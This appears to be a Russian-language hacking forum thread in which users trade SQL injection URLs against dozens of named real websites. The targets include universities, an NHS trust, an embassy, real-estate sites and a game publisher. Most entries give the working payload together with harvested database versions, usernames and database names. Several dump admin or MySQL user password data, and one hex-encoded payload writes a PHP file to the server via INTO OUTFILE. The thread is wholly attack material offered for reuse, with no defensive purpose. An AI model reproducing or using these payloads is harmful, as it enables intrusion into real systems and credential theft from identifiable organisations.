http://life.gubkin.ru/polls/about.php?id=-5+union+select+1,2,3,4,group_concat(0x0b,name,0x3a 3a,pass,0x3a3a,fam),6+from+users--
Хостинг-Провайдер какой-то
Тиц 700
PR 9
Code:
http://ebscohost.com/cinahl/default.php?id=8-999.9+union+select+concat_ws(0x3a,user(),version() ,database(),@@version_compile_os),2,3,4,5,6,7,8,9, 10,11,12,13,14--
вывод в исходном коде.
version - 5.0.18-log
user - mktgadmin@localhost
database - epMarketing
os - suse-linux
http://www.starhotels.com/hotel/rosa_milano/starhotels_rosa.php?idalb=9+and+substring(version( ),1,1)=4
PR-6
тИЦ-240
Сборочка № 3
bromley.nhs.uk тиц 10 pr 4
Code:
http://www.bromley.nhs.uk/content.php?page=68-999.9+union+select+1,2,concat_ws(0x3a,version(),us er(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16, 17--
horturba.com тиц 10 pr 4
Code:
http://horturba.com/castellano/pagina.php?ID=21-999.9+union+select+1,2,3,4,concat_ws(0x3a,version( ),user(),database())--
gammaprojects.com тиц 20 pr 3
Code:
http://www.gammaprojects.com/print/index2.php?ID=11-999.9+union+select+1,concat_ws(0x3a,user(),databas e(),version()),3,4--
sonyakeogh.ie pr 3
Code:
http://www.sonyakeogh.ie/blank.php?id=22-999.9+union+select+concat_ws(0x3a,version(),user() ,database()),2--
marketing-non-marchand.ch pr 2
Code:
http://www.marketing-non-marchand.ch/index2.php?id=1063-999.9+union+select+1,2,concat_ws(0x3a,user(),datab ase(),version()),4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19--
linnartz.nl pr 4
Code:
http://www.linnartz.nl/pagina.php?id=3-999.9+union+select+1,concat_ws(0x3a,user(),databas e(),version()),3--
triaddiner.com pr 4
Code:
http://www.triaddiner.com/rec_view.php?recipeid=9-999.9+union+select+1,2,3,concat_ws(0x3a,version(), user(),database()),5--
reeniesrecipes.com pr 2
Code:
http://www.reeniesrecipes.com/view.php?recipe_id=165-999.9+union+select+1,2,3,4,concat_ws(0x3a,version( ),user(),database()),6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--
insejec.com.br pr 3
Code:
http://www.insejec.com.br/estudos_info.php?content=85-999.9+union+select+1,2,concat_ws(0x3a,version(),us er(),database())--
oecovita.com pr 2
Code:
http://www.oecovita.com/print.php?s=70-999.9+union+select+1,concat_ws(0x3a,version(),user (),database())--
atm2000.es pr 1
Code:
http://www.atm2000.es/seccion.php?idseccion=14-999.9+union+select+1,2,3,concat_ws(0x3a,user(),dat abase(),version()),5,6,7,8,9,10,11,12--
deciudades.com
Code:
http://www.deciudades.com/Contenido.php?sec=17-999.9+union+select+1,concat_ws(0x3a,user(),databas e(),version()),3,4,5--
P.S. Если вывод не в середине огромными буквами,это не значит что его нет))).Он также может быть в титле и исходнике.
P.S.S Следущая сборочка либо завтра,либо через 3 недели в связи с моим отъездом.
http://www.meritalia.it/scheda.php?cat=2&id=97+and+substring(version(),1,1)=5+--+
PR-4
тИЦ-30
Konqi said:
http://www.meritalia.it/scheda.php?cat=2&id=97+and+substring(version(),1,1)=5+--+
PR-4
тИЦ-30
http://www.meritalia.it/scheda.php?cat=2&id=(select*from(select+name_const(version(),1),nam e_const(version(),1))a)
Duplicate column name '5.0.16-standard'
http://www2.dse.unibo.it/dsa/profile.php?id=-33+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26
dse.unibo.it
PR-6
тИЦ-10
unibo.it
PR-8
тИЦ-475
Version -- 5.0.41-log
OS : http://www.desktopsatellite.com/images/solarislogo.gif
foothillsgazette.com
Code:
http://www.foothillsgazette.com/print.php?s=3-999.9+union+select+1,2,3,4,5,concat_ws(0x3a,versio n(),user(),database(),@@version_compile_os),7,8,9, 10,11,12,13,14,15,16,17,18,19,20,21--
PR 4
version - 5.0.27-standard
user - foothill@localhost
database - foothill_newspaper
os - linux-gnu
опа
Code:
http://www.foothillsgazette.com/print.php?s=3-999.9+union+select+1,2,3,4,5,group_concat(0x0b,use r,0x3a,password,0x3a,host,0x3a,file_priv),7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21+from+mysql.user+--
www.radiozammu.it
http://www.radiozammu.it/index.php?sez=programma&id=-30+union+select+1,2,3,4,5
Version : 5.0.51a-24+lenny3
OS : http://freedos-32.sourceforge.net/lean/debian_logo.png
PR-6
----
www.ettu.org
http://www.ettu.org/news_view.php?id=-2756+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16+from+admin
version : 4.1.10-standard
OS : http://shutter-project.org/wp-content/uploads/PCLinuxOS-logo.png
PR-6
ТИЦ-190
MoscowSnab.ru
Code:
http://moscowsnab.ru/and/index.php?CID=-5+and+1=2+union+select+1,concat_ws(char(58),@@vers ion,user(),database(),@@version_compile_os)+--
version : 4.1.25-log
user : odaxru00_o@localhost
database : odaxru00_m
os : portbld-freebsd6.3
http://www.chris-elgood.co.uk/news_detail.php?id=-9+union+select+1,2,group_concat(0x0b,admin_login,0 x3a,admin_password),4,5,6,7,8,9+from+admin--
Code:
http://www.dolphyn.com.br/index.php?section=23-999.9+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,us er(),version(),database(),@@version_compile_os),9, 10,11,12,13--
PR 3
version - 5.0.45
user - dolphyn@localhost
database - dolphyn
os - linux-gnu
BlackFan
23.06.2010, 18:42
HUDSON
Code:
http://www.hudsonent.com/user/tos.php?page_id=-5+union+select+1,2,concat_ws(0x3a,user(),database( ),version()),4
http://www.hudsonent.com/user/tos.php?page_id=-5+union+select+1,2,concat_ws(0x3a,username,user_pa ssword,user_level),4+from+bb_user
user = huds40@localhost
database = huds40
version = 5.0.90-community
Square Enix Mobile
Code:
http://www.sqexm.com/games.php?id=8'+union+select+1,2,3,concat_ws(0x3a, user(),version(),database()),5,6,7,8,9,10,11+--+
user = squser@germanium
database = mobile_live
version = 5.1.30-log
Big Blue Bubble
Code:
http://bigbluebubble.com/index.php?page=aboutus&cat_id=118+and+mid(version(),1,1)=5
version = 5.0.91-log
http://www.azbuka-sna.ru/template.php?mode=1&catalog=-10+and+1=2+union+select+1,2,3,4,5,6,7,concat_ws(0x 3a,@@version,user(),database(),@@version_compile_o s),9+--
version : 5.0.89-log
user : srv12686_login@c32-w.ht-systems.ru
database : srv12686_base
os : portbld-freebsd8.0
Code:
http://fedexorangebowlmerch.com/holseninc.php?rub=2-999.9+union+select+1,concat_ws(0x3a,user(),version (),database(),@@version_compile_os),3,4,5,6,7,8,9, 10,11,12,13,14--
PR 4
version - 5.0.77-log
user - u70563741@cgihost
databse - d60506463
os - freebsd6.2
http://karoknauf.ru/specialoffer/?parent=10&id=-14+union+select+1,2,3,4,5,6,7,concat_ws(char(58),@ @version,user(),database(),@@version_compile_os),9 ,10,11,12+--
version : 5.0.90-log
user : u153178@10.8.0.51
database : u153178
os : portbld-freebsd7.2
life_glider
24.06.2010, 03:46
http://www.composeusa.com/news_news_details.php?news_id=-1%20union%20select%201,2,3,concat_ws%280x3a,versio n%28%29,database%28%29,@@version_compile_os%29,5
os:redhat-linux-gnu
http://www.informuniversal.ru/show.php?id=-7+union+select+1,2,concat_Ws(0x3a,version(),user() ,database(),@@version_compile_os)
Database Version: 4.0.27-max-log
Database name: informun
User name: informun@v56.valuehost.ru
Os: freebsd 4.7
http://www.ruraldoc.com.au/content_sub.php?id=-48+union+select+1,2,3,4,5,6
Version : 4.1.13a-nt
OS : http://www.unipress.co.uk/images/Windows_logo_35px.png
PR-5
---------
http://www.nic.cu/form_det.php?form_id=3+and+1=0+union+select+1,2,3, 4,5,6,7,8,9,10,11
Version : 5.0.85-log
OS : http://a3.twimg.com/profile_images/484879177/freebsd-logo-head_normal.png
PR-6
----------
http://www.medicc.org/mediccreview/index.php?issue=&id=99999+/*!UNION*/+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13--&a=vp
Version : 5.1.47
OS : http://shutter-project.org/wp-content/uploads/PCLinuxOS-logo.png
PR-6
Code:
http://www.full-harmony.ru/catalog2.php?id=-20+union+select+1,concat_ws%280x0b,version%28%29,u ser%28%29,database%28%29%29,3,4,5,6,7%20--
version : 4.1.25-log
user : fullhar9_kruser@localhost
database : fullhar9_kr
http://www.ies-europe.org/event.php?article_id=-219+union+select+1,2,3,4+from+information_schema.t ables--
Version : 5.0.90
OS : http://www.gnumed.de/theme/images/distro-logos/48x48/PCLinuxOS-icon.png
PR-5
-------
http://www.rbeurope.org/afiseaza.php?id=-26+or(1,1)=(select+count(0),concat((select+concat( email,char(58),password)+from+users+limit+1,1),flo or(rand(0)*2))from(information_schema.tables)group +by+2)--+
Version : 5.0.90
OS : http://www.gnumed.de/theme/images/distro-logos/48x48/PCLinuxOS-icon.png
PR-5
-------
http://www.jbblegal.lt/image_view.php?img_id=-8694+union+select+1,2&l=en
Version : 4.0.27-log
OS : http://a3.twimg.com/profile_images/484879177/freebsd-logo-head_normal.png
PR-5
--------
https://www.sloncek.si/index.php?zgm=-2+union+select+1,2,3,4,5,6,7
Version : 5.0.90-community-log
OS : http://www.ellogon.org/2004_site/images/tux-48x48.png
PR-4
http://www.baku-media.ru/text.php?id=-152'+union+select+1,2,3,concat_ws(0x3a,login, pwd),5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22+from+u sers/*
http://www.budgetnik.ru/reader.htm?id=-1148+union+select+1,2,3,4,version(),u ser(),7,8,9,10, 11,12,13--
http://www.lawyercom.ru/reader.htm?id=-1148+union+ select+1,2,3,4,user( ),version(),database(),8,9,10,11,12,13, 14--
http://www.gaz21.org/photo.php?kod_d=-58+union+select+concat_ ws(0x3a,username,user_password), 2,3,4,5,6+from+forum_users/ *
http://echo.oranim.ac.il/ main.php?p=categoria&id_cat=-39+union+select+1,2,ver sion(),4,5,6- -
http://www.reeltoo.ru/re/live/?show=-22861+union+all+select+1,2,3,4,5,6,7,8,version(),1 0,database(), user(),13,14,15,16,17,18, 19,20,21,22,23,24,25,26,27 ,28,29,30,31,32,33,34,35,36,37--
http://tesi.seu.ru/index.php?§ion=-9+union+select+1,2,version( ),4,5,6, 7,8--
http://www.gjk.ru/news.php?newid=-1'+union+select+1, version(),3,4, 5,6,7/*
баянов нет
http://www.lecka.si/skupina.php?pid=-11+UniOn+select+null,version(),null,null
Version : PostgreSQL 8.1.21
OS :http://img1.pwhite.net/wp-includes/images/red-hat-logo-45.png
PR-5
--------
http://www.lifetrek-slovenia.com/en/H2O_activities.php?sub=43&id=-70'+or(1,1)=(select+count(0),concat((select+concat (username,char(58),password)+from+user+limit+0,1), floor(rand(0)*2))from(information_schema.tables)gr oup+by+2)--+
Version : 5.0.51
OS : http://www.abclinuxu.cz/images/clanky/dn/debian-logo-48x48.png
PR-4
--------
http://www.embavenez-us.org/news.php?nid=-5252+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13
Version : 4.0.27-standard
OS : http://shutter-project.org/wp-content/uploads/PCLinuxOS-logo.png
--------
http://www.benayoun.com/projet.php?id=-120+or(1,1)=(select+count(0),concat((select+versio n()+from+information_schema.tables+limit+0,1),floo r(rand(0)*2))from(information_schema.tables)group+ by+2)--+
Version : 5.0.44-log
OS :http://shutter-project.org/wp-content/uploads/PCLinuxOS-logo.png
PR-5
---------
http://www.leseditionsdeminuit.com/f/index.php?sp=livAut&auteur_id=-1794+union+select+1,2
Version : 4.1.22
OS :http://www.ellogon.org/2004_site/images/tux-48x48.png
PR-5
/*columns 1,2 */
---------
http://www.bacfilms.com/fichesalles.php?id=455+and+substring(version(),1,1 )=3
Version : ~3.1
PR-6
Тиц-110
----------
http://www.brusa.biz/news/news.php?l_sel=2&idm=4&idk=-9+or(1,1)=(select+count(0),concat((select+version( )+from+information_schema.tables+limit+0,1),floor( rand(0)*2))from(information_schema.tables)group+by +2)--+
Verson : 5.1.42-log
OS: http://a3.twimg.com/profile_images/484879177/freebsd-logo-head_normal.png
PR-4
---------
http://www.interversion.org/version.php?params=project.php?id=12&katid=-1+or(1,1)=(select+count(0),concat((select+version( )+from+information_schema.tables+limit+0,1),floor( rand(0)*2))from(information_schema.tables)group+by +2)--+
Version : 5.0.51a-24+lenny3-log
OS : http://www.abclinuxu.cz/images/clanky/dn/debian-logo-48x48.png
PR-4
.:[melkiy]:.
25.06.2010, 17:53
Code:
http://www.tidoma.ru/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws(0x3a,username,pa ssword,usertype),4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+fr om+jos_users
http://union-ltd.ru/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws
(0x3a,username,password,usertype),4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32+from+jos_users+--+
http://www.living-redsea.ru/index.php?option=com_properties&task=agentlisting&aid=-91+/*!UNION*/+ALL+SELECT+1,2,concat_ws
(0x3a,username,password,usertype),4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32+from+jos_users+--+
http://zdesdeshevle.ru/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws
(0x3a,username,password,usertype),4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32+from+jos_users+--+
http://www.tidoma.ru/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws
(0x3a,username,password,usertype),4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32+from+jos_users+--+
http://www.ekspert-realty.ru/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_Ws
(0x3a,username,password,usertype),4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32+from+exp_users+--+
http://www.galeriahomes.ru/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws
(0x3a,username,password,usertype),4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32+from+jos_users+--+
http://www.adobs.ru/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws
(0x3a,username,password,usertype),4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32+from+jos_users+--+
http://www.interhouse-egypt.com/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws
(0x3a,username,password,usertype),4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32+from+fdhgfdgfgh_users+--+
http://yalta-r.com.ua/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws
(0x3a,username,password,usertype),4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32+from+jos_users+--+
http://www.sam-house.ru/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws
(0x3a,username,password,usertype),4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32+from+jos_users+--+
http://kvartiru-kupipodolsk.ru/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws
(0x3a,username,password,usertype),4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32+from+jos_users+--+
http://www.calabriadreams.com/site/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws
(0x3a,username,password,usertype),4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32+from+jos_users+--+
http://kvartiru-kupipodolsk.ru/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws
(0x3a,username,password,usertype),4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32+from+jos_users+--+
http://www.ooo-solnce.ru/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws
(0x3a,username,password,usertype),4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32+from+jos_users+--+
http://www.interzante.gr/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws
(0x3a,username,password,usertype),4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32+from+jos_users+--+
http://sam-house.ru/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws
(0x3a,username,password,usertype),4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32+from+jos_users+--+
http://domhouse74.ru/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws
(0x3a,username,password,usertype),4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32+from+jos_users+--+
http://www.swissnetwork.ch/realestate/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws
(0x3a,username,password,usertype),4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32+from+jos_users+--+
http://www.domturtsia.ru/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws
(0x3a,username,password,usertype),4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32+from+jos_users+--+
http://www.edub9intl.com/rooftop/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws
(0x3a,username,password,usertype),4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32+from+jos_users+--+
http://dallasrehab.biz/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws
(0x3a,username,password,usertype),4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32+from+jos_users+--+
http://www.pocketcasa.biz/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws
(0x3a,username,password,usertype),4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32+from+jos_users+--+
http://www.piramida.crimea.ua/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws
(0x3a,username,password,usertype),4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32+from+jos_users+--+
http://prvigroup.ua/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws
(0x3a,username,password,usertype),4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32+from+sqs_users+--+
http://ugniydom.com.ua/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws
(0x3a,username,password,usertype),4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32+from+jos_users+--+
http://monarch-estate.com.ua/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws
(0x3a,username,password,usertype),4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32+from+josn_users+--+
http://nc-realty.kiev.ua/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws
(0x3a,username,password,usertype),4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32+from+jos_users+--+
http://prima-consors.ru/estate/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws
(0x3a,username,password,usertype),4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32+from+jos_users+--+
http://yalta-r.com.ua/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws
(0x3a,username,password,usertype),4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32+from+jos_users+--+
http://www.canariasviptravel.ru/index.php?option=com_properties&task=agentlisting&aid=-91+/*!UNION*/+ALL+SELECT+1,2,concat_ws
(0x3a,username,password,usertype),4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32+from+jos_users+--+
http://www.kottege.ru/kottege.ru/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws
(0x3a,username,password,usertype),4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32+from+jos_users+--+
http://galeria-homes.ru/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws
(0x3a,username,password,usertype),4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32+from+jos_users+--+
http://www.imoti-vt.com/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws
(0x3a,username,password,usertype),4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32+from+jos_users+--+
http://epis-stroi.com/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws
(0x3a,username,password,usertype),4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32+from+jos_users+--+
http://www.seamore.ru/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws
(0x3a,username,password,usertype),4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32+from+jos_users+where+usertype='Supe r+Administrator'+--+
http://land-flat.ru/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws
(0x3a,username,password,usertype),4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32+from+jos_users+--+
http://www.living-redsea.ru/index.php?option=com_properties&task=agentlisting&aid=-91+/*!UNION*/+ALL+SELECT+1,2,concat_ws
(0x3a,username,password,usertype),4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32+from+jos_users+--+
http://auto-rezerv.ru/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,concat_ws
(0x3a,username,password,usertype),4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32+from+jos_users+--+
http://www.jbblegal.lt/image_view.php?img_id=-8694+union+select+1,version()&l=en
Version : 4.0.27-log
OS : http://a3.twimg.com/profile_images/484879177/freebsd-logo-head_normal.png
PR-5
→ Немного блинда
130 тиц, 2 PR
http://shintop.ru/novosibirsk/catalog_shop.php?action=item&id=1271300943%27+and+substring((select+concat(vers ion(),0x3a,username,0x3a,user_password)+from+f_use rs+where+username=%27admin%27+limit+0,1),1,1)=5--+
admin:$H$9...
--------------------------------------------------------------------------
6 PR
http://bot.fiu.edu/index.php?name=athletics'+and+substring(version(), 1,1)=4--+
Error == true;
--------------------------------------------------------------------------
275 тиц, 4 PR
http://www.igb.ru/rus/index.php?id=600&a=profile&uid=15+and+substring((select+version()),1,1)=5
Раньше было нормально, а сейчас на union select реагирует так, - "Уклонися от зла и сотвори благо".
--------------------------------------------------------------------------
220 тиц, 5 PR
http://www.your-people.ru/pbl.php/(66)and(substring(version(),1,1))=5
--------------------------------------------------------------------------
5200 тиц, 6 PR
http://www.finansmag.ru/blogs/post/(570)and(substring((select(version())),1,1))=5
--------------------------------------------------------------------------
90 тиц
http://www.marnava.ru/tur/(876)and(substring(version(),1,1))=5/*/type/1/cat/13/
--------------------------------------------------------------------------
450 тиц, 3 PR
http://www.soling.ru/news/?id=15+AND+SUBSTRING(select version(),1,1)=4/*
--------------------------------------------------------------------------
10 тиц, 7 PR
http://www.ncver.edu.au/newsevents/news/(issue_226)and(substring((select(version())),1,1)) =(5).html
--------------------------------------------------------------------------
60 тиц, 2 PR
http://www.inodetal.ru/parts.php?code=31715+and+substring(concat((select+ version()+from+information_schema.columns+limit+0, 1),1,1),1,1)=5
→ Немного с выводом
30 тиц, 1 PR
http://www.citytool.ru/catalogue/akkumulyatornie_udarnie_drelishurupoverti/?vendor_id=-305%27+union+select+1,2,group_concat(table_schema, 0x3a,table_name,0x3a,column_name),4+from+informati on_schema.columns+where+column_name+like+'%pass%'--+
5.0.45:citytoolsql@localhost:Login_citytool
--------------------------------------------------------------------------
30 тиц, 1 PR
http://www.bighunter.ru/iproducts.php?id=-11027+union+select+1,2,3,4,group_concat(username,0 x3a,passwd,0x3a,admin),6,7,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21,22,23,24+from+db_grant--+
5.0.51a:bighunter@localhost:bighunter
--------------------------------------------------------------------------
550 тиц, 4 PR
http://www.dizel-status.ru/electro.php?raz=11&id=-7+union+select+1,2,version(),4,5,6,7--+
5.0.67-community-logenergo_dizel@localhostenergo_dizel
--------------------------------------------------------------------------
100 тиц, 4 PR
http://www.kopitan.ru/shop/?dir=77-1&pid=-141+union+select+1,2,3,4,5,6,7,concat(user,0x3a,pa ssword,0x3a,file_priv,0x3a,host),version(),10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45 ,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,6 2,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78, 79,80,81,82,83,84,85,86,87+from+mysql.user--+
4.0.27:root@pm9.zenon.net:kopitan
--------------------------------------------------------------------------
350 тиц, 5 PR
http://ftacademy.ru/science/nich/?show=nir&id=6+union+select+1,version(),3,4,5,6,7,8--+
4.1.22-standard-log:academy_maybug@localhost:academy_site5
--------------------------------------------------------------------------
300 тиц, 4 PR
http://www.baimusic.ru/search/pianosearch.php?minprice=0.029999999329448&maxprice=30740.099609375&keysnum=76&rid=-1+union+select+1,2,3,4,5,6,concat(table_name,0x3a, column_name),8,9,10,11,12,13,14,15,16+from+informa tion_schema.columns+where+column_name+like+0x25706 1737325--+
5.0.22-logianoshop@celsius.www.attrade.ruianoshop
--------------------------------------------------------------------------
475 тиц, 3 PR
http://www.g4rt.ru/game.php?genre_id=21&game_id=-46+union+select+1,version(),3,4,5,6,7,8,9--+
5.0.90-log:g4rt@localhost:g4rt
--------------------------------------------------------------------------
70 тиц, 3 PR
http://www.u-m-s.ru/tovar.php?id=1440%27+union+select+1,version(),3,4, 5,6,7--+
4.0.26-log:Uwww3689S@localhost:udb3689
--------------------------------------------------------------------------
90 тиц, 4 PR
Dump table in file.
http://www.poznay-mir.ru/hotel.php?uid=-106+union+select+0x7c2d31303620756e696f6e2073656c6 5637420312c276861636b6564272c3320696e746f206f75746 6696c6520272f746d702f616e7469636861742e70687027202 d2d207c,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,0x27,0x27--+&resort=76
5.0.87:root@zvm32.host.ruoznaymir
--------------------------------------------------------------------------
550 тиц, 4 PR
http://www.dizel-status.ru/electro.php?raz=89&id=-602+union+select+version()--+
5.0.67-community-log:energo_dizel@localhost:energo_dizel
--------------------------------------------------------------------------
110 тиц, 2 PR
http://www.sb-78.ru/documentation/?tidd=-508+union+select+1,2,group_concat(login,0x3a,pass, 0x3a,name,0x3a,access),4,5+from+users--+
5.0.32-Debian_7etch11-log:sbuser@localhost:Gordeev_main
--------------------------------------------------------------------------
5 PR
http://www.sareg.hacettepe.edu.tr/salih.php?salih=instrumentationsdet&photo=-1+union+select+1,group_concat(table_name,0x3a,colu mn_name),3,4,5,6,7+from+information_schema.columns +where+column_name+like+0x257061737325--+
5.0.51a-log:sareg@web.hacettepe.edu.tr:sareg
--------------------------------------------------------------------------
10 тиц, 5 PR
http://www.iphils.uj.edu.pl/?l=pl&p=1&r=-27+union+select+1,2,3,version%28%29,5,6,7,8,9,10,1 1,12,13,14,15--+
5.0.37:fil@localhosthilss
http://www.aflsportsready.com.au/email/news.asp?id=128+and+substring(version(),1,1)=4
PR-5
-------
http://extra.holyfamily.edu/news/news.asp?id=-603+or+1=(select+top+1+table_name+from+information _schema.tables)
PR-5
--------
http://www.learningmigration.com/comenius/index.php?section=welcome&id=-15+union+select+1,concat_ws(0x3a,user(),version(), database()),3,4,5,6,7,8,9,10,11,12,13,14--
PR-6
--------
